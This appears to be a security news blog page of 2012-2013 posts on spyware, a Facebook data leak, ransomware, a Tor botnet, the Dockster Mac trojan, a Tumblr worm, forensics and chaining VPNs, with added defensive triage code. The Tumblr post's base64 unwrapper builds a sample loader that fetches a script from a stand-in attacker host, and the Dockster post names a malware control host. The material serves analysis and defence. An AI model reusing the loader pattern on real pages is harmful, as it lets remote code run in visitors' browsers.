Showing posts with label Cyber Security.

Spying Software Found on Chinese Devices

Jun 24, 2013 | comments


After fleeing to the US in May last year, Chinese activist Chen Guangcheng was given a fellowship at New York University. Now that the fellowship has come to an end, some interesting aspects of the story have come to light.

According to Reuters, several pieces of spying software have been identified on devices owned by Chen, including an iPhone and an iPad he had received shortly after his arrival in the US from the wife of activist Bob Fu, who runs the Christian group ChinaAid.

The presence of the spyware was brought to light by NYU professor Jerome Cohen and another individual familiar with the incident.
While some say the devices were infected with spyware from the start, others point the finger at NYU itself for installing the applications.
Among the spy applications, technicians found one that secretly turned the devices into a tracking system, and a password-protected program that uploaded data to a remote server.

Facebook Issue May Have Leaked Your Email and Phone Number

Jun 22, 2013 | comments



Facebook has just published a data breach notification on its security blog.
You might not guess that from the title of the article, which announces itself as an "Important Message from Facebook's White Hat Program."
The cloud (bad pun intended) is that Facebook's own systems made the fault possible in the first place.

What Facebook seems to be admitting to, in Friday's breach notification, is that it was careless with the aggregated data accumulated from contact list uploads.
The problem, says Facebook, lay in its Download Your Information (DYI) feature, which exists so you can pull down everything you've previously entrusted to the social networking giant.

DYI improves availability, because it lets you make your own off-site backup of everything you've stored on Facebook. It improves transparency, because it acts as a record of everything you've uploaded to Facebook over the years. But there was a bug in DYI, of the data leakage/unauthorised disclosure sort.
Apparently, DYI was capable of letting you download more than you'd uploaded in the first place: contact details that other people had uploaded ended up in your archive.
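The bug class described above is an export that returns data the requester never supplied. The following is an added illustration, not Facebook's code and not a description of its internals: a toy contact-upload store with hypothetical accounts (alice, bob, carol), an export routine that aggregates everything matched to a friend regardless of who uploaded it, and the corrected version that applies a provenance check.

```python
"""The data-leakage class behind the DYI bug: an export that returns more than the requester put in."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class ContactUpload:
    """One address-book entry uploaded by `uploader` that the site matched to account `subject`."""
    uploader: str
    subject: str
    email: Optional[str] = None
    phone: Optional[str] = None


# Constructed sample data (hypothetical accounts, not real users).
# Alice uploaded an address book containing Bob's work e-mail;
# Carol uploaded one containing Bob's phone number; Bob uploaded Alice's e-mail.
UPLOADS: List[ContactUpload] = [
    ContactUpload("alice", "bob", email="bob.work@example.com"),
    ContactUpload("carol", "bob", phone="+1-555-0100"),
    ContactUpload("bob", "alice", email="alice@example.com"),
]


def _merge(entry: Dict[str, str], upload: ContactUpload) -> None:
    if upload.email:
        entry["email"] = upload.email
    if upload.phone:
        entry["phone"] = upload.phone


def export_vulnerable(requester: str, friends: Set[str]) -> Dict[str, Dict[str, str]]:
    """Builds the requester's archive from everything matched to their friends, regardless of
    who supplied it. `requester` is never consulted, which is exactly the defect: Carol's
    upload of Bob's phone number ends up in Alice's export."""
    out: Dict[str, Dict[str, str]] = {}
    for u in UPLOADS:
        if u.subject in friends:
            _merge(out.setdefault(u.subject, {}), u)
    return out


def export_fixed(requester: str, friends: Set[str]) -> Dict[str, Dict[str, str]]:
    """Same export with a provenance check: a row is included only if the requester
    uploaded it. Data other people supplied about a friend is never theirs to download."""
    out: Dict[str, Dict[str, str]] = {}
    for u in UPLOADS:
        if u.subject in friends and u.uploader == requester:
            _merge(out.setdefault(u.subject, {}), u)
    return out


def leaked_fields(requester: str, friends: Set[str]) -> List[str]:
    """Lists the subject.field pairs the vulnerable export hands over that the fixed one does not."""
    vuln, safe = export_vulnerable(requester, friends), export_fixed(requester, friends)
    return sorted(
        f"{subject}.{field}"
        for subject, fields in vuln.items()
        for field in fields
        if field not in safe.get(subject, {})
    )
```

Running `leaked_fields("alice", {"bob"})` shows the one field that crosses the line: Bob's phone number, which only Carol ever uploaded. The general rule is that an export endpoint must filter on who supplied each record, not merely on who the record is about.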


U.S. is Spying on China,Stealing ‘Millions’ of Texts : Edward Snowden

Jun 21, 2013 | comments



Former NSA contractor Edward Snowden revealed on Saturday that the U.S. is tapping into Chinese mobile carriers to access customers’ text messages.
It’s not just a few messages, either. Snowden told the South China Morning Post that millions of Chinese text messages are being harvested by the U.S.

“China should set up a national information security review commission as soon as possible,” Snowden told the paper.
Chinese mobile users sent over 900 billion text messages in 2012, according to government statistics, so if Snowden's claims are true, the volume collected is small in the grand scheme of things. (Chinese officials are unlikely to see it in that light, though.)

The revelation will make an already rocky relationship between the U.S. and China even more tumultuous. President Obama and China's new president Xi Jinping have already held several conversations about cybersecurity, and both leaders are kicking off a series of regular talks between the two countries.

Russian Hackers Break Into Australian Medical Center Data, Demand $4,000 Ransom

Dec 10, 2012 | comments

An Australian medical practice has been held to ransom by a group of Russian hackers. The hackers encrypted the practice's patient database, rendering it unusable until decrypted.

The hackers are demanding a ransom of $4,000 to decrypt the sensitive information held on a server at the Miami Family Medical Centre. The modest sum is typical: extortionists tend to go for a low-yield, high-volume approach to increase their chances of a payout.


The practice in question is Miami Family Medical Centre, whose co-owner David Wood believed that anti-virus software was enough protection against intrusion and other security threats.
Cases like this should serve as a wake-up call for businesses to get proper security advice from professionals, particularly those responsible for sensitive medical information. When you deal with information like this, ignorance is not an excuse.

An IT firm has been called in to try to recover the information from backups. After analysing the encryption, the experts have concluded that, although it is not recommended, paying the ransom may be the only way to recover the encrypted data. Paying buys no guarantee of a working decryptor; the reliable defence is a backup kept offline, where the same intrusion cannot encrypt it, and restore-tested before it is needed.
In the meantime, the Miami Family Medical Centre continues to operate, but the task is not easy without patient records.

Skynet Botnet Command and Control Servers Controlled Over Tor

Dec 8, 2012 | comments

Security researchers have identified a botnet controlled by its creators over the Tor anonymity network. It's likely that other botnet operators will adopt this approach.

The botnet is called Skynet and can be used to launch DDoS (distributed denial-of-service) attacks, mine Bitcoin using the graphics cards installed in infected computers, download and execute arbitrary files, or steal login credentials for websites, including online banking ones.

However, what really makes this botnet stand out is that its command and control (C&C) servers are only accessible from within the Tor anonymity network using the Tor Hidden Service protocol.
Tor hidden services are most commonly Web servers, but can also be Internet Relay Chat (IRC), Secure Shell (SSH) and other types of servers. These services can only be accessed from inside the Tor network through a random-looking hostname that ends in the .onion pseudo-top-level domain.

The Hidden Service protocol was designed to hide the IP (Internet Protocol) address of the clients from the service and the IP address of the service from the clients, making it almost impossible for the parties involved to determine each other's physical location or real identity. Like all traffic passing through the Tor network, the traffic between a Tor client and a Tor hidden service is encrypted and is randomly routed through a series of other computers acting as Tor relays.
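The "random-looking hostname" is not random: it is derived from the hidden service's public key, which is why the name cannot be seized or spoofed without that key, and why an operator can keep the same C&C address across server moves. As an added example (not code from the original post or from any Skynet analysis), the block below derives v2 names the way Tor did in 2012, derives and checksum-verifies the current v3 names, and pulls both kinds out of a text blob, which is the defensive use: finding C&C names in a sample's strings or config. The key bytes are constructed placeholders, not a real service's key.

```python
"""Tor hidden-service hostnames are derived from the service key; parse, derive and validate them."""
import base64
import binascii
import hashlib
import re
from typing import List, Tuple


def v2_onion(rsa_public_key_der: bytes) -> str:
    """v2 scheme (the one in use when Skynet was found): base32 of the first 80 bits
    of SHA-1 over the service's DER-encoded RSA public key, giving 16 characters."""
    digest = hashlib.sha1(rsa_public_key_der).digest()[:10]
    return base64.b32encode(digest).decode("ascii").lower() + ".onion"


def v3_onion(ed25519_pubkey: bytes) -> str:
    """v3 scheme: base32(pubkey || checksum || version), 56 characters, where
    checksum = SHA3-256(".onion checksum" || pubkey || version)[:2] and version = 0x03."""
    if len(ed25519_pubkey) != 32:
        raise ValueError("ed25519 public key must be 32 bytes")
    version = b"\x03"
    checksum = hashlib.sha3_256(b".onion checksum" + ed25519_pubkey + version).digest()[:2]
    return base64.b32encode(ed25519_pubkey + checksum + version).decode("ascii").lower() + ".onion"


def verify_v3(address: str) -> bool:
    """True only if the address decodes to 35 bytes with version 3 and a matching checksum."""
    host = address[:-6] if address.endswith(".onion") else address
    if len(host) != 56:
        return False
    try:
        raw = base64.b32decode(host.upper())
    except binascii.Error:
        return False
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:]
    if version != b"\x03":
        return False
    return hashlib.sha3_256(b".onion checksum" + pubkey + version).digest()[:2] == checksum


# 56-char v3 alternative first, so the regex does not stop at a 16-char prefix of a v3 name.
ONION_RE = re.compile(r"\b([a-z2-7]{56}|[a-z2-7]{16})\.onion\b")


def find_onions(blob: str) -> List[Tuple[str, str]]:
    """Extract .onion names from text (a config dump, strings output, a log) and classify them."""
    found = []
    for m in ONION_RE.finditer(blob):
        addr = m.group(0)
        if len(m.group(1)) == 16:
            kind = "v2"
        else:
            kind = "v3" if verify_v3(addr) else "v3-bad-checksum"
        found.append((addr, kind))
    return found


# Constructed sample: a fake DER blob and a fake ed25519 key, not from any real service.
SAMPLE_RSA_DER = b"\x30\x82\x01\x0a\x02\x82\x01\x01\x00" + bytes(range(256)) + b"\x02\x03\x01\x00\x01"
SAMPLE_ED25519 = bytes(range(32))
SAMPLE_V3 = v3_onion(SAMPLE_ED25519)
# Corrupt a character inside the checksum field (char 52 carries only checksum bits) to show detection.
TAMPERED_V3 = SAMPLE_V3[:52] + ("a" if SAMPLE_V3[52] != "a" else "b") + SAMPLE_V3[53:]
SAMPLE_BLOB = (
    "bot config: c2=" + v2_onion(SAMPLE_RSA_DER) + " fallback=" + SAMPLE_V3 + "\n"
    "junk: " + TAMPERED_V3 + " not-an-onion.example\n"
)
```

`find_onions(SAMPLE_BLOB)` returns the v2 name, the valid v3 name and the tampered one flagged as `v3-bad-checksum`. v2 names carry no checksum, so any 16 base32 characters look plausible; that is one reason a v3 match is a stronger indicator in triage than a v2 one.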

As far as I understand, there is no technical way either to trace or to take down the hidden services used for C&C.

Microsoft ERP hack

Dec 7, 2012 | comments


Security researchers have presented proof-of-concept code capable of accessing the database driving a Microsoft ERP system and then diverting funds while avoiding immediate detection.
Tom Eston and Brett Kimmel of vendor SecureState presented the would-be malware this week at the Black Hat Abu Dhabi conference.

For hackers seeking big money, infiltrating an enterprise resource planning system would be like hitting the jackpot. Once inside, cybercriminals would have access to financial software, as well as applications driving business operations.

Makers of corporate enterprise resource planning (ERP) systems include Oracle and SAP, while Microsoft's Dynamics Great Plains software is for midsize businesses.

Hacking Great Plains, or any other ERP system, requires more than just technical expertise. An accountant would also be needed to make sense of the information in the database and to manipulate accounts in a way that avoids immediate detection.

The SecureState team behind the research, which it called Project Mayhem, included technical experts and a certified public accountant. "It's that blending of unique knowledge that facilitates the ability to find [where to] attack."

Dockster: New Mac Trojan OSX/Dockster Targets gyalwarinpoche.com Website Related To Dalai Lama

Dec 4, 2012 | comments

A website related to the Dalai Lama is hosting attack code that attempts to surreptitiously install OS X-based spy software on the Macs of people who visit.

The malware is now known to be in the wild and the remote address contacted by the backdoor is now active. The Java-based exploit uses the same vulnerability as Flashback, CVE-2012-0507. Current versions of Mac OS X, and systems with the browser's Java plugin disabled, should be safe from the exploit. The payload, Backdoor:OSX/Dockster.A, is a basic backdoor with file download and keylogger capabilities.

If it is executed, the trojan deletes itself from the location where it was run and installs itself in the user's home directory under the filename .Dockset. The leading dot keeps the file out of Finder; while it is running, however, it can be seen in OS X's Activity Monitor. It creates a launch agent called mac.Dockset.deman so that the trojan restarts each time the affected user logs in. Once active, it tries to contact the remote address itsec.eicp.net to await instructions. At the time of the initial analysis this address was not registered, which suggested the sample might be a test rather than an active threat.
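The persistence mechanism above (a per-user launch agent pointing at a dot-prefixed file in the home directory) is easy to triage without any vendor tooling. The following is an added example, not code from Intego or from the original post: it builds a constructed home directory containing a plist with the label and filename reported for Dockster alongside a benign agent, then lists the agents that match the pattern. The binary is a placeholder string, not a real sample.

```python
"""Triage macOS per-user LaunchAgents for the persistence pattern Dockster uses."""
import pathlib
import plistlib
import tempfile
from typing import Dict, List


def suspicious_launch_agents(home: pathlib.Path) -> List[Dict[str, object]]:
    """Flag agents whose program is a dot-prefixed (Finder-hidden) file under the home directory."""
    findings: List[Dict[str, object]] = []
    agents_dir = home / "Library" / "LaunchAgents"
    for plist_path in sorted(agents_dir.glob("*.plist")):
        try:
            with open(plist_path, "rb") as fh:
                data = plistlib.load(fh)
        except (plistlib.InvalidFileException, ValueError):
            continue  # malformed plist: worth a look, but not this check's job
        args = data.get("ProgramArguments") or [data.get("Program", "")]
        program = pathlib.Path(str(args[0]))
        hidden_in_home = program.name.startswith(".") and str(program).startswith(str(home))
        if not hidden_in_home:
            continue
        reasons = ["hidden executable under the home directory"]
        if data.get("RunAtLoad"):
            reasons.append("RunAtLoad: starts at every login")
        if data.get("KeepAlive"):
            reasons.append("KeepAlive: relaunched if killed")
        findings.append({
            "plist": plist_path.name,
            "label": data.get("Label"),
            "program": str(program),
            "program_exists": program.exists(),
            "reasons": reasons,
        })
    return findings


def build_sample_home() -> pathlib.Path:
    """Constructed home directory mirroring the names reported for Dockster, plus a benign agent."""
    home = pathlib.Path(tempfile.mkdtemp(prefix="sample-home-"))
    agents = home / "Library" / "LaunchAgents"
    agents.mkdir(parents=True)
    (home / ".Dockset").write_bytes(b"placeholder, not a real Mach-O binary")
    with open(agents / "mac.Dockset.deman.plist", "wb") as fh:
        plistlib.dump({
            "Label": "mac.Dockset.deman",
            "ProgramArguments": [str(home / ".Dockset")],
            "RunAtLoad": True,
            "KeepAlive": True,
        }, fh)
    with open(agents / "com.example.updater.plist", "wb") as fh:
        plistlib.dump({
            "Label": "com.example.updater",
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
            "RunAtLoad": True,
        }, fh)
    return home
```

On a real machine, point `suspicious_launch_agents` at `pathlib.Path.home()`; the benign agent is not reported because its program lives under /Applications, while the Dockster-style one is reported together with the `RunAtLoad` and `KeepAlive` flags that make it survive logout and termination.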

In the case of Flashback, which was also discovered by Intego, a reported 600,000 Macs were affected before Apple and Oracle both released Java patches to remove the malware and protect against future attacks.

Although the newly-found Dockster takes advantage of an already fixed weakness, users who haven't yet updated their Macs or are running older software may still be at risk.

Tumblr Suffering From a Viral Hack

Dec 3, 2012 | comments


Tumblr seems to be suffering from a viral hack at the moment: several blogs appear to have been compromised and are now displaying a message from the notorious troll organisation GNAA.
The problem seems to lie on Tumblr's side, and Tumblr has acknowledged it, so account credentials probably haven't been compromised.

“There is a viral post circulating on Tumblr which begins ‘Dearest ‘Tumblr’ users.’ If you have viewed this post, please log out of all browsers that may be using Tumblr immediately. Our engineers are working to resolve the issue as swiftly as possible,” Tumblr explained.

An embed tag contained in the post linked to malicious code on another website. The JavaScript, loaded through an iframe pointing at an outside site, was base64-encoded. Base64 represents binary data as printable ASCII characters; it is not encryption, but it has the side effect of making it harder to tell at a glance what a script will do when executed.
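Because base64 only hides the payload from a casual glance, the first triage step is to unwrap it without executing anything. The following is an added example, not code from Tumblr or from the worm itself: it takes a constructed post body with a hidden iframe whose `data:` URI carries a base64 page, which in turn hides its real script source behind `atob()`, and recovers every embedded URL. The domain `attacker.invalid` is a placeholder (`.invalid` is reserved and never resolves).

```javascript
"use strict";
// Unwrap base64-encoded loaders of the kind found in the Tumblr worm post.

const IFRAME_SRC_RE = /<iframe[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi;
const DATA_URI_RE = /^data:([^;,]+)?;base64,([\s\S]+)$/i;
const ATOB_RE = /atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g;
const URL_RE = /https?:\/\/[^\s"'<>()]+/g;

// Base64 is an encoding, not encryption: anyone holding the post can reverse it.
// Pad defensively; obfuscators often strip the trailing '='.
function decodeB64(text) {
  const padded = text + "=".repeat((4 - (text.length % 4)) % 4);
  try {
    return Buffer.from(padded, "base64").toString("utf8");
  } catch (e) {
    return "";
  }
}

// Returns every decoded payload and every URL it references, so an analyst can see
// where the loader actually goes without running it.
function unwrapPost(html) {
  const payloads = [];
  for (const m of html.matchAll(IFRAME_SRC_RE)) {
    const d = DATA_URI_RE.exec(m[1]);
    if (d) payloads.push(decodeB64(d[2]));
  }
  // Decode atob() blobs in the post itself and in anything the data: URIs unpacked.
  for (const text of [html, ...payloads]) {
    for (const m of text.matchAll(ATOB_RE)) payloads.push(decodeB64(m[1]));
  }
  const urls = new Set();
  for (const p of payloads) for (const u of p.match(URL_RE) || []) urls.add(u);
  return { payloads, urls: [...urls].sort() };
}

// Constructed post body: an iframe whose data: URI hides a script loader behind base64,
// and that loader in turn hides its real destination behind atob().
function buildSamplePost() {
  const stage2 =
    'var s=document.createElement("script");s.src="http://attacker.invalid/payload.js";document.body.appendChild(s);';
  const inner = 'eval(atob("' + Buffer.from(stage2).toString("base64") + '"))';
  const stage1 = "<html><body><script>" + inner + "</script></body></html>";
  const dataUri = "data:text/html;base64," + Buffer.from(stage1).toString("base64");
  return (
    "<p>Dearest 'Tumblr' users,</p>\n" +
    '<iframe width="1" height="1" style="display:none" src="' + dataUri + '"></iframe>\n'
  );
}

const result = unwrapPost(buildSamplePost());
console.log(result.urls); // the real script source hidden two layers down
```

The outer page never mentions `attacker.invalid`; the URL only appears after peeling both layers, which is why "it's just base64" is not a reason to skip the decode during triage.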

There's no way to know how many blogs have been affected so far, and the only way to avoid your blog being taken over is to stay off Tumblr and log out of your account. Not the greatest of fixes, but it's all that works for now.

The exploit through which all of this was accomplished is unknown for now; the speculation is that the attackers used a bug in Tumblr's embedding system to get their scripts to run from there.

The malicious post can be removed from infected accounts using the Tumblr mass editor. The site also recommends that affected users change their account password, a measure that's probably not necessary, but wise given that Tumblr's engineers have yet to offer a complete analysis of the attack.

Trading Forex Website Targeted

Nov 28, 2012 | comments

A FOREX trading website called "Trading Forex", located at hxxp://tradingforex.com, has been contaminated with a malicious Java applet designed to install malware on the systems of visitors.

FOREX is the foreign exchange market where international currencies are traded, and nowadays, it's used by millions of people around the world. 

The backdoor planted on Trading Forex is written in Visual Basic .NET and requires Microsoft's .NET Framework to be installed and running on the victim's computer, which is an unusual choice.

Hackers intent on distributing malware through compromised websites often use pre-packaged tools, available through underground forums, most notably the widely used Blackhole Exploit kit.

Rise Of The Machines : Human Judgment Required

Nov 24, 2012 | comments


As custom government malware becomes an increasingly common international weapon with real-world effects—breaking a centrifuge, shutting down a power grid, scrambling control systems—do we need legal limits on the automated decision-making of worms and rootkits? Do we, that is, need to keep a human in charge of their spread, or of when they attack? According to the US government, no we do not.

A recently issued Department of Defense directive signed by Deputy Secretary of Defense Ashton Carter sets military policy for the design and use of autonomous weapons systems in combat. The directive is intended to minimize "unintended engagements"—weapons systems attacking targets other than enemy forces, or weapon systems causing collateral damage. But the directive specifically exempts autonomous cyber weapons.

Most weapon systems, the policy states, "shall be designed to allow commanders and operators to exercise appropriate levels of human judgment over the use of force," regardless of whether the system is using lethal "kinetic" weapons or some form of non-lethal force. If bullets, rockets, or missiles are to be fired, tear gas is to be launched, or systems are to be jammed, a human needs to make the final decision on when they are used and at whom they are aimed.

How To Become a Computer Forensics Expert

Nov 9, 2012 | comments

What a Computer Forensics Investigator needs to understand

A Computer Forensics Investigator needs to be able to understand the process of investigating a cybercrime, the laws involved and the details in obtaining the necessary authorisation to perform the investigation.

Each computer forensics case is different, and each country’s laws are different too. Most difficult of all: attacks are becoming more elaborate every day.

The Computer Forensics Investigator must have the necessary information technology and security skills, to be able to deal with these different situations.

The examination process, and the many different types of digital evidence, make computer forensics a time-consuming process. So a Computer Forensics Investigator must also have the skills to manage projects and resources.
 
First things first: the First Responder

The most important function of a computer forensics investigator starts with the First Responder. Roles of the First Responder include: securing, evaluating and documenting the electronic crime scene; conducting preliminary interviews; collecting, preserving, packaging and transporting electronic evidence; and finally reporting the crime.
 
The role of the Computer Forensics Investigator

Below are a few actions required of the Investigator:
• Recover deleted files and deleted partitions in Windows, Mac OS X, and Linux
• Crack passwords, understand password-cracking processes and have access to password-cracking tools
• Understand types of password attacks and how to investigate a password-protected file breach
• Understand different types of log capturing techniques, log management, log capturing tools and time synchronisation
• Investigate logs, network traffic, wireless attacks, and web attacks
• Track e-mails and investigate e-mail crimes.
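Before any of the analysis above starts, the First Responder's "preserving" duty has a concrete form: a hash manifest taken at acquisition, so that every later examination can prove the evidence is still what was collected. The block below is an added example, not part of the original article or any certification curriculum: it builds a constructed evidence tree (a placeholder log line with a TEST-NET address and a zero-filled image, not real captures), records SHA-256 digests, and then shows how a wiped log and a stray file both surface on verification.

```python
"""Hash manifest for acquired evidence: prove later that nothing changed after collection."""
import hashlib
import pathlib
import tempfile
from typing import Dict, List


def hash_file(path: pathlib.Path, algorithm: str = "sha256") -> str:
    """Stream the file so multi-gigabyte images do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: pathlib.Path) -> Dict[str, str]:
    """Relative POSIX path -> digest for every file under root, in a stable order."""
    root = pathlib.Path(root)
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify_manifest(root: pathlib.Path, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the evidence tree against the manifest recorded at acquisition time."""
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "added": sorted(k for k in current if k not in manifest),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed evidence set; the log line and image are placeholders, not real captures."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="evidence-"))
    (root / "logs").mkdir()
    (root / "logs" / "auth.log").write_text(
        "Jan  1 00:00:01 host sshd[4242]: Accepted password for root from 203.0.113.5 port 51234 ssh2\n"
    )
    (root / "disk.img").write_bytes(b"\x00" * 4096)
    manifest = build_manifest(root)  # recorded, signed and filed with the chain-of-custody form
    # Anything that happens after acquisition must show up as a discrepancy:
    (root / "logs" / "auth.log").write_text("")                  # log wiped
    (root / "notes.txt").write_text("examiner scratch file\n")   # stray file added to the tree
    return verify_manifest(root, manifest)
```

The manifest itself must be kept where the evidence handlers cannot alter it (signed, or on separate write-once media); a manifest stored next to the evidence proves only that both were changed together. Work on copies and verify the originals against the manifest again before presenting them.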
 
How does computer forensics fit within the ethical hacking world?

Ethical hacking and computer forensics are closely related. Ethical hacking is the process that follows vulnerability assessments and scanning: the art of exploitation with permission. Understanding how an attacker gets in is therefore a core skill and requirement within the computer forensics world.

When a computer forensics investigator is tasked with the collection, examination, identification, preservation, recovery, analysis and presentation of evidence as facts, the attacker's perspective gained through ethical hacking is what lets them do it effectively.
 
Computer forensics certifications

There are several computer forensics certifications to choose from. Among the best known:
· C|HFIv8 - Computer Hacking Forensics Investigator, from the EC-Council
· GCFE - Certified Forensic Examiner, from GIAC (SANS)
· CCFE - Certified Computer Forensics Examiner, from the IACRB
· CCE - Certified Computer Examiner, from the ISFCE

Anonymity

May 10, 2012 | comments


A VPN connects you to a remote network and encrypts and forwards your traffic, on all ports, through it. This also changes the IP address the rest of the Internet sees. Chaining VPNs is a tricky task, though there is a simple and uncommon method I know of. Using two VPNs in series means no single provider sees both your real address and your destination, which makes you much harder to correlate; it does not make you completely anonymous against an adversary who can watch both ends, and it is only as good as the providers' logging.

How To Chain VPNs

First, you connect to the first VPN. Then, while connected to it, you connect to the second; since many customers share the first VPN's exit IP, the second VPN sees only that shared address, not yours. Better still is to use an overseas provider as your first hop, since your own country's authorities cannot simply demand its logs, which raises the bar further.
In practice, however, running two OpenVPN clients on the same host is awkward: each client wants to take over the default route, so the second tunnel is not reliably carried inside the first. That is manageable if you control both VPN endpoints (not very likely), but there is a simpler way.
So, how can we chain VPNs? I'll show you how by using a virtual machine.

Requirements

  • Windows, Mac or Linux OS
  • Admin/root privileges
  • OpenVPN
  • VirtualBox
  • 2 VPN accounts (free ones are easy to find with a Google search, but remember that the provider's logging policy, not its price, decides how much protection this setup really gives you)

Step 1 Install OpenVPN & a VirtualBox Computer

Indented lines are terminal commands.
First, Linux users need the OpenVPN client, built from source as below or installed from their distribution's package manager. Windows users can download the installer from the OpenVPN project and run it normally. Mac users can use a GUI OpenVPN client for Mac.
  1. Change to the Downloads directory, extract the OpenVPN source tarball, and change into the extracted directory.
  2. Configure the build.
    ./configure
  3. Compile and install.
    make && sudo make install
  4. Now install VirtualBox. This lets us run a virtual operating system inside our computer. Download VirtualBox for Windows, Mac or Linux from the VirtualBox site.
  5. Install a virtual machine of your choice (Windows or Linux), then install OpenVPN inside it.

Step 2 Chain the VPNs

Start up your virtual machine, and configure both clients: one on the host, one in the guest.
  1. For Windows users using the default VPN .
  2. Connect to VPN A with your host OS.
  3. Start up your virtual machine of choice, and connect to VPN B from inside it.
  4. Operate from within the virtual machine. Its traffic leaves through VPN B, and VPN B's traffic leaves the host through VPN A, so neither provider sees both ends. Keep in mind that if either tunnel drops, traffic silently falls back to the plain network unless you add firewall rules that only permit traffic to the VPN server; and if you need to get rid of the virtual machine later, securely delete its disk image and any snapshots.
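After step 3 it is worth checking, from inside the guest, that its traffic really can only leave through the tunnel. The block below is an added example, not part of the original how-to: it parses `ip route` output from a Linux guest and decides which interface the kernel would use for a few probe addresses. The two routing tables are constructed samples (one with OpenVPN's redirect-gateway routes in place, one after the tunnel died), and `203.0.113.10` is a hypothetical address for the VPN B server.

```python
"""Check, from inside the guest, that its traffic can only leave through the VPN B tunnel."""
import ipaddress
from typing import Dict, List, Optional

# Constructed `ip route` output from a Linux guest with OpenVPN's redirect-gateway active:
# the two /1 routes beat the DHCP default, and the VPN server itself is pinned to the
# physical gateway so the tunnel's own packets do not try to enter the tunnel.
CONNECTED = """\
0.0.0.0/1 via 10.8.0.1 dev tun0
default via 192.168.56.1 dev eth0 proto dhcp metric 100
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.2
128.0.0.0/1 via 10.8.0.1 dev tun0
192.168.56.0/24 dev eth0 proto kernel scope link src 192.168.56.10 metric 100
203.0.113.10 via 192.168.56.1 dev eth0
"""

# The same guest after the OpenVPN process died: the /1 routes are gone and everything
# silently falls back to the guest's NAT adapter, i.e. straight out through the host.
TUNNEL_DOWN = """\
default via 192.168.56.1 dev eth0 proto dhcp metric 100
192.168.56.0/24 dev eth0 proto kernel scope link src 192.168.56.10 metric 100
203.0.113.10 via 192.168.56.1 dev eth0
"""

VPN_B_SERVER = "203.0.113.10"  # hypothetical address of the second VPN endpoint


def parse_routes(ip_route_output: str) -> List[Dict[str, object]]:
    """Keep the fields routing decisions need: destination, gateway, device, metric."""
    routes: List[Dict[str, object]] = []
    for line in ip_route_output.strip().splitlines():
        parts = line.split()
        route: Dict[str, object] = {"dst": "0.0.0.0/0" if parts[0] == "default" else parts[0], "metric": 0}
        for key in ("via", "dev", "metric"):
            if key in parts:
                route[key] = parts[parts.index(key) + 1]
        route["metric"] = int(str(route["metric"]))
        routes.append(route)
    return routes


def egress_device(routes: List[Dict[str, object]], ip: str) -> Optional[str]:
    """Longest-prefix match, lowest metric on ties: the interface the kernel would pick."""
    addr = ipaddress.ip_address(ip)
    best = None
    for r in routes:
        net = ipaddress.ip_network(str(r["dst"]), strict=False)
        if addr not in net:
            continue
        key = (net.prefixlen, -int(str(r["metric"])))
        if best is None or key > best[0]:
            best = (key, r)
    return str(best[1].get("dev")) if best else None


def check_guest_routing(ip_route_output: str, vpn_server: str) -> List[str]:
    """Empty list means every probe leaves via a tun interface and the server route stays outside it."""
    routes = parse_routes(ip_route_output)
    problems = []
    for probe in ("1.1.1.1", "198.51.100.7"):  # one address in each /1 half of the Internet
        dev = egress_device(routes, probe) or "nowhere"
        if not dev.startswith("tun"):
            problems.append(f"{probe} would leave via {dev}, not the tunnel")
    if (egress_device(routes, vpn_server) or "").startswith("tun"):
        problems.append("route to the VPN server points into the tunnel itself (loop)")
    return problems


if __name__ == "__main__":
    for name, table in (("connected", CONNECTED), ("tunnel down", TUNNEL_DOWN)):
        print(name, "->", check_guest_routing(table, VPN_B_SERVER) or "OK")
```

On a live guest, feed it the output of `ip route` instead of the constants. The check is a snapshot: the `TUNNEL_DOWN` table is exactly the state a dead OpenVPN process leaves behind, and nothing in the routing table prevents it, which is why a firewall rule in the guest that drops everything on the NAT interface except traffic to the VPN server (the "kill switch") belongs in this setup.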
 
Copyright © 2011. INDIATRIKS - All Rights Reserved